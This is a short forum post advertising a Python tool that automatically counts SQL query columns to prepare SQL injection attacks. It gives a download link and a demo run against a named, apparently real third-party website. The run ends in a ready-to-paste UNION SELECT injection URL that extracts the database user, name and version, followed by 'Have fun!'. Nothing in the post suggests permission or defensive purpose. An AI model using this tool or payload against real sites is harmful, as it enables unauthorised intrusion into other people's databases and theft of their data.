Search the Community

[*] Description The Full Automated Column Finder helps you to determine the correct amount of columns of the current SQL query. It is useful for SQL injection and safes you some time fuzzing manually. After the correct amount of columns was found, a sample URL for exploiting the SQL injection vulnerability can be displayed. [*] Download http://xenuser.org/tools/column_finder.py [*] Author webpage Ascii for Breakfast [*] Source Full Automated Column Finder for SQL Injection [*] Demo hp work # python column_finder.py -u "http://www.mida.ro/content.php?id=21" >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> Full Automated Column Finder for SQL Injection by Valentin Hoebel (valentin@xenuser.org) Version: 1.1 (23th May 2010) <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< >> Checking if connection can be established... >> Connected to target! URL seems to be valid. >> Trying to find the correct number of columns... >> Correct number of columns found! >> Amount: 4 >> Do you want to have a sample URL for exploiting? (Yes/No) Yes http://www.mida.ro/content.php?id=21+AND+1=2+UNION+SELECT+concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version())-- Simply copy and paste this link into your browser Have fun! Bye